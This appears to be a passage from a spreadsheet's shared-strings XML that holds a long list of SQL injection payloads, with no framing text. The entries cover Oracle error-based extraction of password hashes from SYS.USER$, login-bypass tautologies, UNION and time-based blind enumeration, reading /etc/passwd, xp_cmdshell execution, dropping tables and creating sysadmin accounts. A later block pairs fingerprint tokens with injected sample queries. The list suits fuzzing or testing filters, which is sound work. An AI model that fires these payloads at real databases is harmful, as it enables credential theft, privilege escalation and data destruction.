    <t>' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( PASSWORD )  FROM  ( SELECT DISTINCT ( PASSWORD ) , ROWNUM AS LIMIT FROM SYS.USER$ )  WHERE LIMIT = 6  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( table_name )  FROM  ( SELECT DISTINCT ( table_name ) , ROWNUM AS LIMIT FROM sys.all_tables )  WHERE LIMIT = 6  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( column_name )  FROM  ( SELECT DISTINCT ( column_name ) , ROWNUM AS LIMIT FROM all_tab_columns )  WHERE LIMIT = 6  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( granted_role )  FROM  ( SELECT DISTINCT ( granted_role ) , ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE = SYS.LOGINUSER )  WHERE LIMIT = 6  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( USERNAME )  FROM  ( SELECT DISTINCT ( USERNAME ) , ROWNUM AS LIMIT FROM SYS.ALL_USERS )  WHERE LIMIT = 7  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( PASSWORD )  FROM  ( SELECT DISTINCT ( PASSWORD ) , ROWNUM AS LIMIT FROM SYS.USER$ )  WHERE LIMIT = 7  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( table_name )  FROM  ( SELECT DISTINCT ( table_name ) , ROWNUM AS LIMIT FROM sys.all_tables )  WHERE LIMIT = 7  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( column_name )  FROM  ( SELECT DISTINCT ( column_name ) , ROWNUM AS LIMIT FROM all_tab_columns )  WHERE LIMIT = 7  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( granted_role )  FROM  ( SELECT DISTINCT ( granted_role ) , ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE = SYS.LOGINUSER )  WHERE LIMIT = 7  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( USERNAME )  FROM  ( SELECT DISTINCT ( USERNAME ) , ROWNUM AS LIMIT FROM SYS.ALL_USERS )  WHERE LIMIT = 8  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( PASSWORD )  FROM  ( SELECT DISTINCT ( PASSWORD ) , ROWNUM AS LIMIT FROM SYS.USER$ )  WHERE LIMIT = 8  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( table_name )  FROM  ( SELECT DISTINCT ( table_name ) , ROWNUM AS LIMIT FROM sys.all_tables )  WHERE LIMIT = 8  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( column_name )  FROM  ( SELECT DISTINCT ( column_name ) , ROWNUM AS LIMIT FROM all_tab_columns )  WHERE LIMIT = 8  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( granted_role )  FROM  ( SELECT DISTINCT ( granted_role ) , ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE = SYS.LOGINUSER )  WHERE LIMIT = 8  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t xml:space="preserve">'|| ( elt ( -3+5,bin ( 15 ) ,ord ( 10 ) ,hex ( char ( 45  )  )    )  )  </t>
  </si>
  <si>
    <t>||6</t>
  </si>
  <si>
    <t>'||'6</t>
  </si>
  <si>
    <t xml:space="preserve"> ( ||6 ) </t>
  </si>
  <si>
    <t>or 1 = 1</t>
  </si>
  <si>
    <t>; or '1' = '1'</t>
  </si>
  <si>
    <t>" or isNULL ( 1/0 )  /*</t>
  </si>
  <si>
    <t>' or '7659' = '7659</t>
  </si>
  <si>
    <t xml:space="preserve">' -- </t>
  </si>
  <si>
    <t>' or 1 = 1--</t>
  </si>
  <si>
    <t>" or 1 = 1--</t>
  </si>
  <si>
    <t>' or 1 = 1 /*</t>
  </si>
  <si>
    <t>or 1 = 1--</t>
  </si>
  <si>
    <t>' or 'a' = 'a</t>
  </si>
  <si>
    <t>" or "a" = "a</t>
  </si>
  <si>
    <t>' )  or  ( 'a' = 'a</t>
  </si>
  <si>
    <t>admin' or '</t>
  </si>
  <si>
    <t>' select * from information_schema.tables--</t>
  </si>
  <si>
    <t xml:space="preserve"> )  union select * from information_schema.tables;</t>
  </si>
  <si>
    <t>' having 1 = 1--</t>
  </si>
  <si>
    <t>' group by userid having 1 = 1--</t>
  </si>
  <si>
    <t>' select name from syscolumns where id  =   ( select id from sysobjects where name  =  tablename' ) --</t>
  </si>
  <si>
    <t>' union all select @@version--</t>
  </si>
  <si>
    <t>' or 'unusual'  =  'unusual'</t>
  </si>
  <si>
    <t>' or 'something'  =  'some'+'thing'</t>
  </si>
  <si>
    <t>' or 'text'  =  n'text'</t>
  </si>
  <si>
    <t>' or 'something' like 'some%'</t>
  </si>
  <si>
    <t>' or 2 &gt; 1</t>
  </si>
  <si>
    <t>' or 'text' &gt; 't'</t>
  </si>
  <si>
    <t xml:space="preserve">' or 'whatever' in  ( 'whatever' ) </t>
  </si>
  <si>
    <t>' or 2 between 1 and 3</t>
  </si>
  <si>
    <t>' or username like char ( 37 ) ;</t>
  </si>
  <si>
    <t>' union select * from users where login  =  char ( 114,111,111,116 ) ;</t>
  </si>
  <si>
    <t xml:space="preserve">' union select </t>
  </si>
  <si>
    <t>password:*/ = 1--</t>
  </si>
  <si>
    <t>uni/**/on sel/**/ect</t>
  </si>
  <si>
    <t>'; execute immediate 'sel' || 'ect us' || 'er'</t>
  </si>
  <si>
    <t xml:space="preserve">'; exec  ( 'sel' + 'ect us' + 'er' ) </t>
  </si>
  <si>
    <t>'/**/or/**/1/**/ = /**/1</t>
  </si>
  <si>
    <t>' or 1/*</t>
  </si>
  <si>
    <t xml:space="preserve"> or isNULL ( 1/0 )  /*</t>
  </si>
  <si>
    <t xml:space="preserve">' -- &amp;password = </t>
  </si>
  <si>
    <t xml:space="preserve">'; begin declare @var varchar ( 8000 )  set @var = ':' select @var = @var+'+login+'/'+password+' ' from users where login &gt; </t>
  </si>
  <si>
    <t>@var select @var as var into temp end --</t>
  </si>
  <si>
    <t>' and 1 in  ( select var from temp ) --</t>
  </si>
  <si>
    <t>' union select 1,load_file ( '/etc/passwd' ) ,1,1,1;</t>
  </si>
  <si>
    <t>1; ( load_file ( char ( 47,101,116,99,47,112,97,115,115,119,100  )  )   ) ,1,1,1;</t>
  </si>
  <si>
    <t>' and 1 =  (  if  (  (  load_file ( char ( 110,46,101,120,116  )  )  &lt;&gt;char ( 39,39  )  )  ,1,0  )  )  ;</t>
  </si>
  <si>
    <t>'; exec master..xp_cmdshell 'ping 10.10.1.2'--</t>
  </si>
  <si>
    <t>create user name identified by 'pass123'</t>
  </si>
  <si>
    <t xml:space="preserve">create user name identified by pass123 temporary tablespace temp default tablespace users; </t>
  </si>
  <si>
    <t>' ; drop table temp --</t>
  </si>
  <si>
    <t>exec sp_addlogin 'name' , 'password'</t>
  </si>
  <si>
    <t>exec sp_addsrvrolemember 'name' , 'sysadmin'</t>
  </si>
  <si>
    <t xml:space="preserve">insert into mysql.user  ( user, host, password )  values  ( 'name', 'localhost', password ( 'pass123'  )  )  </t>
  </si>
  <si>
    <t>grant connect to name; grant resource to name;</t>
  </si>
  <si>
    <t xml:space="preserve">insert into users ( login, password, level )  values (  char ( 0x70 )  + char ( 0x65 )  + char ( 0x74 )  + char ( 0x65 )  + char ( 0x72 )  + char ( 0x70 )  + char ( 0x65 )  + char ( 0x74 )  + char ( 0x65 )  + char ( 0x72 ) ,char ( 0x64 ) </t>
  </si>
  <si>
    <t>' or 1 = 1 --</t>
  </si>
  <si>
    <t>' union  ( select @@version )  --</t>
  </si>
  <si>
    <t>' union  ( select NULL,  ( select @@version  )  )   --</t>
  </si>
  <si>
    <t>' union  ( select NULL, NULL,  ( select @@version  )  )   --</t>
  </si>
  <si>
    <t>' union  ( select NULL, NULL, NULL,   ( select @@version  )  )   --</t>
  </si>
  <si>
    <t>' union  ( select NULL, NULL, NULL, NULL,   ( select @@version  )  )   --</t>
  </si>
  <si>
    <t>' union  ( select NULL, NULL, NULL, NULL,  NULL,  ( select @@version  )  )   --</t>
  </si>
  <si>
    <t>'; if not ( substring  (  (  select @@version ) ,25,1 )  &lt;&gt; 0 )  waitfor delay '0:0:2' --</t>
  </si>
  <si>
    <t>'; if not ( substring  (  (  select @@version ) ,25,1 )  &lt;&gt; 5 )  waitfor delay '0:0:2' --</t>
  </si>
  <si>
    <t>'; if not ( substring  (  (  select @@version ) ,25,1 )  &lt;&gt; 8 )  waitfor delay '0:0:2' --</t>
  </si>
  <si>
    <t>'; if not ( substring  (  (  select @@version ) ,24,1 )  &lt;&gt; 1 )  waitfor delay '0:0:2' --</t>
  </si>
  <si>
    <t>'; if not ( select system_user )  &lt;&gt; 'sa' waitfor delay '0:0:2' --</t>
  </si>
  <si>
    <t xml:space="preserve">'; if is_srvrolemember ( 'sysadmin' )  &gt; 0 waitfor delay '0:0:2' -- </t>
  </si>
  <si>
    <t>'; if not  (  (  select serverproperty ( 'isintegratedsecurityonly'  )  )   &lt;&gt; 1 )  waitfor delay '0:0:2' --</t>
  </si>
  <si>
    <t>'; if not  (  (  select serverproperty ( 'isintegratedsecurityonly'  )  )   &lt;&gt; 0 )  waitfor delay '0:0:2' --</t>
  </si>
  <si>
    <t>&amp; (  ) o1: select * from users where id = 1 or  ( \ )  = 1 union select 1,@@VERSION -- 1</t>
  </si>
  <si>
    <t>&amp; ( . ) o: select * from users where id = 1 or  ( \. )  = 1 union select 1,@@VERSION -- 1</t>
  </si>
  <si>
    <t>&amp; ( 1&amp;1: select * from users where id = 1 or  ( \+ )  = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>&amp; ( 1 ) o: select * from users where id = 1 or  ( 1 )  = 1 union select 1,banner from v$version where rownum = 1 -- 1</t>
  </si>
  <si>
    <t>&amp; ( 1UE: select * from users where id = 1 or  ( \+ )  = 1 union select 1,@@VERSION -- 1</t>
  </si>
  <si>
    <t>&amp; ( n&amp;1: select * from users where id = 1 or  ( $+ )  = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>&amp; ( nUE: select * from users where id = 1 or  ( $+ )  = 1 union select 1,@@VERSION -- 1</t>
  </si>
  <si>
    <t>&amp;.o&amp;1: select * from users where id = 1 or \.&lt;\ or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>&amp;.o1&amp;: select * from users where id = 1 or \.&lt;1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>&amp;.o1U: select * from users where id = 1 or \.&lt;1 union select 1,@@VERSION -- 1</t>
  </si>
  <si>
    <t>&amp;.oUE: select * from users where id = 1 or \.&lt;\ union select 1,@@VERSION -- 1</t>
  </si>
  <si>
    <t>&amp;.on&amp;: select * from users where id = 1 or \.&lt;$ or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>&amp;.onU: select * from users where id = 1 or \.&lt;$ union select 1,@@VERSION -- 1</t>
  </si>
  <si>
    <t>&amp;.oo1: select * from users where id = 1 or \.&lt;  = 1 union select 1,@@VERSION -- 1</t>
  </si>
  <si>
    <t>&amp;1UE1: select * from users where id = 1 ||1 union select 1,banner from v$version where rownum = 1 -- 1</t>
  </si>
  <si>
    <t>&amp;1UEv: select * from users where id = 1 ||1 union select null,banner from v$version where rownum = 1 -- 1</t>
  </si>
  <si>
    <t>&amp;1c: select * from users where id = 1   or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>&amp;1oo&amp;: select * from users where id = 1 or \+&lt;\ or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>&amp;1oo1: select * from users where id = 1 or  1&lt;@ = 1 union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t>&amp;1ooU: select * from users where id = 1 or \+&lt;\ union select 1,@@VERSION -- 1</t>
  </si>
  <si>
    <t>&amp;1oon: select * from users where id = 1 or \+&lt;$ union select 1,@@VERSION -- 1</t>
  </si>
  <si>
    <t>&amp;1ovc: select * from users where id = 1 or 1&amp;@# = 1 union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t>&amp;n.o1: select * from users where id = 1 or $ . = 1 union select 1,@@VERSION -- 1</t>
  </si>
  <si>
    <t>&amp;n1&amp;1: select * from users where id = 1 or $ 1 = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>&amp;n1UE: select * from users where id = 1 or $ 1 = 1 union select 1,@@VERSION -- 1</t>
  </si>
  <si>
    <t>&amp;no&amp;1: select * from users where id = 1 or $&lt;\ or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>&amp;no.&amp;: select * from users where id = 1 or $&lt;\. or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>&amp;no.U: select * from users where id = 1 or $&lt;\. union select 1,@@VERSION -- 1</t>
  </si>
  <si>
    <t>&amp;noUE: select * from users where id = 1 or $&lt;\ union select 1,@@VERSION -- 1</t>
  </si>
  <si>
    <t>&amp;noo&amp;: select * from users where id = 1 or $+&lt;\ or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>&amp;noo1: select * from users where id = 1 or $+&lt;1 union select 1,@@VERSION -- 1</t>
  </si>
  <si>
    <t>&amp;nooU: select * from users where id = 1 or $+&lt;\ union select 1,@@VERSION -- 1</t>
  </si>
  <si>
    <t>&amp;noon: select * from users where id = 1 or $+&lt;$ union select 1,@@VERSION -- 1</t>
  </si>
  <si>
    <t>&amp;o.&amp;1: select * from users where id = 1 or \&lt;\. or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>&amp;o.UE: select * from users where id = 1 or \&lt;\. union select 1,@@VERSION -- 1</t>
  </si>
  <si>
    <t>&amp;o1&amp;1: select * from users where id = 1 or \&lt;1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>&amp;o1UE: select * from users where id = 1 or \&lt;1 union select 1,@@VERSION -- 1</t>
  </si>
  <si>
    <t>&amp;oUE1: select * from users where id = 1 or \&lt;\ union select 1,@@VERSION -- 1</t>
  </si>
  <si>
    <t>&amp;oUEv: select * from users where id = 1 or \&lt;\ union select null,@@VERSION -- 1</t>
  </si>
  <si>
    <t>&amp;on&amp;1: select * from users where id = 1 or \&lt;$ or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>&amp;onUE: select * from users where id = 1 or \&lt;$ union select 1,@@VERSION -- 1</t>
  </si>
  <si>
    <t>&amp;oo1&amp;: select * from users where id = 1 or \&lt;  = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>&amp;oo1U: select * from users where id = 1 or \&lt;  = 1 union select 1,@@VERSION -- 1</t>
  </si>
  <si>
    <t>&amp;ov&amp;1: select * from users where id = 1 or !&lt;@ or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>&amp;ovUE: select * from users where id = 1 or !&lt;@ union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t>&amp;v: select * from users where id = 1 or @`\` union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t>&amp;vc: select * from users where id = 1 or  @$# = 1 union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t>&amp;voo1: select * from users where id = 1 or @&lt;@ = 1 union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> ) &amp;1c: select * from users where id = 1 + ( \ )  or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> ) UEvc: select * from users where id = 1 + ( \ )  union select null,@@VERSION -- 1</t>
  </si>
  <si>
    <t>.&amp;1UE: select * from users where id = 1.&amp;&amp;1 union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t>.&amp;1c: select * from users where id = 1. or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>.&amp;vUE: select * from users where id = 1.&amp;&amp;@ union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t>. ) &amp;1c: select * from users where id = 1 +  ( \. )  or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>. ) UEv: select * from users where id = 1 +  ( \. )  union select null,@@VERSION -- 1</t>
  </si>
  <si>
    <t>.UE1,: select * from users where id = 1.  union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t>.UE1k: select * from users where id = 1. union select 1,banner from v$version where rownum = 1 -- 1</t>
  </si>
  <si>
    <t>.UEf ( : select * from users where id = 1.  union select version (  ) ,version (  )  -- 1</t>
  </si>
  <si>
    <t>.UEv,: select * from users where id = 1. union select null,version (  )  -- 1</t>
  </si>
  <si>
    <t>.UEvc: select * from users where id = 1 +\. union select null,@@VERSION -- 1</t>
  </si>
  <si>
    <t>.UEvk: select * from users where id = 1. union select null,banner from v$version where rownum = 1 -- 1</t>
  </si>
  <si>
    <t>.o&amp;1c: select * from users where id = 1. &lt;@ or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>.o.&amp;1: select * from users where id = 1.&lt;@. or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>.o.UE: select * from users where id = 1.&lt;@. union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t>.o1&amp;1: select * from users where id = 1.*1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>.o1UE: select * from users where id = 1.*1 union select 1,banner from v$version where rownum = 1 -- 1</t>
  </si>
  <si>
    <t>.o1c: select * from users where id = 1.&lt;1# union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t>.oUE1: select * from users where id = 1. &lt;@ union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t>.oUEf: select * from users where id = 1. &lt;@ union select version (  ) ,version (  )  -- 1</t>
  </si>
  <si>
    <t>.oUEv: select * from users where id = 1.*\ union select null,@@VERSION -- 1</t>
  </si>
  <si>
    <t>.on&amp;1: select * from users where id = 1.&lt;@$ or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>.onUE: select * from users where id = 1.&lt;@$ union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t>.ov&amp;1: select * from users where id = 1.%@ or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>.ovUE: select * from users where id = 1.%@ union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t>1&amp;1UE: select * from users where id = 11||1 union select 1,banner from v$version where rownum = 1 -- 1</t>
  </si>
  <si>
    <t>1&amp;1c: select * from users where id = 1 +1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>1 ) &amp;1c: select * from users where id = 1 + ( 1 )  or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>1 ) UE1: select * from users where id = 1 + ( 1 )  union select 1,banner from v$version where rownum = 1 -- 1</t>
  </si>
  <si>
    <t>1 ) UEv: select * from users where id = 1 + ( 1 )  union select null,banner from v$version where rownum = 1 -- 1</t>
  </si>
  <si>
    <t>1UE1k: select * from users where id = 1 +1 union select 1,banner from v$version where rownum = 1 -- 1</t>
  </si>
  <si>
    <t>1UEvk: select * from users where id = 1 +1 union select null,banner from v$version where rownum = 1 -- 1</t>
  </si>
  <si>
    <t>1c: select * from users where id = 11&lt;1# union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t>1o ) &amp;1: select * from users where id = 1 +  ( \+ )  or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>1o ) UE: select * from users where id = 1 +  ( \+ )  union select null,@@VERSION -- 1</t>
  </si>
  <si>
    <t>1o.UE: select * from users where id = 1 +\+. union select null,@@VERSION -- 1</t>
  </si>
  <si>
    <t>1oUE1: select * from users where id = 1 -1&lt;@ union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t>1oUEf: select * from users where id = 1 +1&lt;@ union select version (  ) ,version (  )  -- 1</t>
  </si>
  <si>
    <t>1oUEv: select * from users where id = 1 +1&lt;@ union select null,version (  )  -- 1</t>
  </si>
  <si>
    <t>1oo&amp;1: select * from users where id = 1 + \+%\ or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>1oo1&amp;: select * from users where id = 1 + \+%1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>1oo1U: select * from users where id = 1 + \+%1 union select null,@@VERSION -- 1</t>
  </si>
  <si>
    <t>1ooUE: select * from users where id = 1 + \+*\ union select null,@@VERSION -- 1</t>
  </si>
  <si>
    <t>1oon&amp;: select * from users where id = 1 + \+%$ or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>1oonU: select * from users where id = 1 + \+*$ union select null,@@VERSION -- 1</t>
  </si>
  <si>
    <t>UE ( 1 ) : select * from users where id = 1 union select  ( 1 ) ,banner from v$version where rownum = 1 -- 1</t>
  </si>
  <si>
    <t>UE1&amp;1: select * from users where id = 1 union select 1||1,version (  )  -- 1</t>
  </si>
  <si>
    <t>UE1&amp;v: select * from users where id = 1 union select 1||@,version (  )  -- 1</t>
  </si>
  <si>
    <t>UE111: select * from users where id = 1 union select 1 1$,version (  )  -- 1</t>
  </si>
  <si>
    <t>UE11f: select * from users where id = 1 union select 1 $,version (  )  -- 1</t>
  </si>
  <si>
    <t>UE11n: select * from users where id = 1 union select 1 1a,version (  )  -- 1</t>
  </si>
  <si>
    <t>UE1f ( : select * from users where id = 1 union select 1&lt;@$,version (  )  -- 1</t>
  </si>
  <si>
    <t>UE1kn: select * from users where id = 1 union select 1,banner from v$version where rownum = 1 -- 1</t>
  </si>
  <si>
    <t>UE1n,: select * from users where id = 1 union select .1_,version (  )  -- 1</t>
  </si>
  <si>
    <t>UE1n: select * from users where id = 1 union select 1`\`,version (  )  -- 1</t>
  </si>
  <si>
    <t>UE1nc: select * from users where id = 1 union select 1a#,banner from v$version where rownum = 1 -- 1</t>
  </si>
  <si>
    <t>UE1nk: select * from users where id = 1 union select 1a,banner from v$version where rownum = 1 -- 1</t>
  </si>
  <si>
    <t>UE1nn: select * from users where id = 1 union select .1$_,version (  )  -- 1</t>
  </si>
  <si>
    <t>UE1o,: select * from users where id = 1 union select 1&lt;@,version (  )  -- 1</t>
  </si>
  <si>
    <t>UE1o.: select * from users where id = 1 union select 1&lt;@.,version (  )  -- 1</t>
  </si>
  <si>
    <t>UE1s: select * from users where id = 1 union select 1 $$,version (  )  -- 1</t>
  </si>
  <si>
    <t>UEo1,: select * from users where id = 1 union select !&lt;1,version (  )  -- 1</t>
  </si>
  <si>
    <t>UEoo1: select * from users where id = 1 union select +!&lt;1,version (  )  -- 1</t>
  </si>
  <si>
    <t>UEoov: select * from users where id = 1 union select +!&lt;@,version (  )  -- 1</t>
  </si>
  <si>
    <t>UEov,: select * from users where id = 1 union select !&lt;@,version (  )  -- 1</t>
  </si>
  <si>
    <t>UEv&amp;1: select * from users where id = 1 union select @||1,version (  )  -- 1</t>
  </si>
  <si>
    <t>UEv&amp;v: select * from users where id = 1 union select @&amp;&amp;@,version (  )  -- 1</t>
  </si>
  <si>
    <t>UEv11: select * from users where id = 1 union select @ 1$,version (  )  -- 1</t>
  </si>
  <si>
    <t>UEv1f: select * from users where id = 1 union select  @ $,version (  )  -- 1</t>
  </si>
  <si>
    <t>UEv1n: select * from users where id = 1 union select @ 1a,version (  )  -- 1</t>
  </si>
  <si>
    <t>UEvf ( : select * from users where id = 1 union select @&lt;@$,version (  )  -- 1</t>
  </si>
  <si>
    <t>UEvkn: select * from users where id = 1   union select null,banner from v$version where rownum = 1 -- 1</t>
  </si>
  <si>
    <t>UEvn,: select * from users where id = 1 union select @ _,version (  )  -- 1</t>
  </si>
  <si>
    <t>UEvnn: select * from users where id = 1 union select @ $_,version (  )  -- 1</t>
  </si>
  <si>
    <t>UEvo,: select * from users where id = 1 union select @&lt;@,version (  )  -- 1</t>
  </si>
  <si>
    <t>UEvo.: select * from users where id = 1 union select @&lt;@.,version (  )  -- 1</t>
  </si>
  <si>
    <t>UEvs: select * from users where id = 1 union select @ $$,version (  )  -- 1</t>
  </si>
  <si>
    <t>n.&amp;1c: select * from users where id = 1 +$ . or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>n.UEv: select * from users where id = 1 +$ . union select null,@@VERSION -- 1</t>
  </si>
  <si>
    <t>n1&amp;1c: select * from users where id = 1 +$ 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>n1UEv: select * from users where id = 1 +$ 1 union select null,@@VERSION -- 1</t>
  </si>
  <si>
    <t>no&amp;1c: select * from users where id = 1 +$+ or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>no ) &amp;1: select * from users where id = 1 +  ( $+ )  or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>no ) UE: select * from users where id = 1 +  ( $+ )  union select null,@@VERSION -- 1</t>
  </si>
  <si>
    <t>no.&amp;1: select * from users where id = 1 +$+. or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>no.UE: select * from users where id = 1 +$+. union select null,@@VERSION -- 1</t>
  </si>
  <si>
    <t>noUEv: select * from users where id = 1 +$+ union select null,@@VERSION -- 1</t>
  </si>
  <si>
    <t>noo&amp;1: select * from users where id = 1 + $+%\ or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>noo1&amp;: select * from users where id = 1 + $+%1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>noo1U: select * from users where id = 1 + $+%1 union select null,@@VERSION -- 1</t>
  </si>
  <si>
    <t>nooUE: select * from users where id = 1 + $+*\ union select null,@@VERSION -- 1</t>
  </si>
  <si>
    <t>noon&amp;: select * from users where id = 1 + $+%$ or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>noonU: select * from users where id = 1 + $+*$ union select null,@@VERSION -- 1</t>
  </si>
  <si>
    <t>o&amp;1c: select * from users where id = 1 &lt;@ or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>o (  ) &amp;1: select * from users where id = 1 % ( \ )  or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>o (  ) UE: select * from users where id = 1 * ( \ )  union select null,@@VERSION -- 1</t>
  </si>
  <si>
    <t>o ( 1 ) &amp;: select * from users where id = 1 % ( 1 )  or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>o ( 1 ) U: select * from users where id = 1 * ( 1 )  union select 1,banner from v$version where rownum = 1 -- 1</t>
  </si>
  <si>
    <t>o ( n ) &amp;: select * from users where id = 1 % ( $ )  or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>o ( v ) &amp;: select * from users where id = 1 % ( @ )  or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>o.&amp;1c: select * from users where id = 1 &lt;@. or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>o..&amp;1: select * from users where id = 1 &lt;@.. or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>o..UE: select * from users where id = 1&lt;@.. union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t>o.UE1: select * from users where id = 1 &lt;@. union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t>o.UEf: select * from users where id = 1  &lt;@. union select version (  ) ,version (  )  -- 1</t>
  </si>
  <si>
    <t>o.UEv: select * from users where id = 1 *\. union select null,@@VERSION -- 1</t>
  </si>
  <si>
    <t>o.n&amp;1: select * from users where id = 1 &lt;@.$ or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>o.nUE: select * from users where id = 1 &lt;@.$ union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t>o1&amp;1c: select * from users where id = 1 *1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>o1UE1: select * from users where id = 1 *1 union select 1,banner from v$version where rownum = 1 -- 1</t>
  </si>
  <si>
    <t>o1UEv: select * from users where id = 1 *1 union select null,banner from v$version where rownum = 1 -- 1</t>
  </si>
  <si>
    <t>o1c: select * from users where id = 1 &lt;1## union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t>o1n&amp;1: select * from users where id = 1 &lt;@1$ or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>o1nUE: select * from users where id = 1 &lt;@1$ union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t>oUEvc: select * from users where id = 1 *\ union select null,@@VERSION -- 1</t>
  </si>
  <si>
    <t>on&amp;1c: select * from users where id = 1 &lt;@$ or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>on.&amp;1: select * from users where id = 1 %$ . or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>on.UE: select * from users where id = 1 *$ . union select null,@@VERSION -- 1</t>
  </si>
  <si>
    <t>on1&amp;1: select * from users where id = 1 %$ 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>on1UE: select * from users where id = 1 %$ 1 union select null,@@VERSION -- 1</t>
  </si>
  <si>
    <t>onn&amp;1: select * from users where id = 1 &lt;@$_ or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>onnUE: select * from users where id = 1 &lt;@$_ union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t>oo&amp;1c: select * from users where id = 1 &lt;@&lt;@ or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>oo1&amp;1: select * from users where id = 1 %!&lt;1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>oo1UE: select * from users where id = 1 | |1 union select 1,banner from v$version where rownum = 1 -- 1</t>
  </si>
  <si>
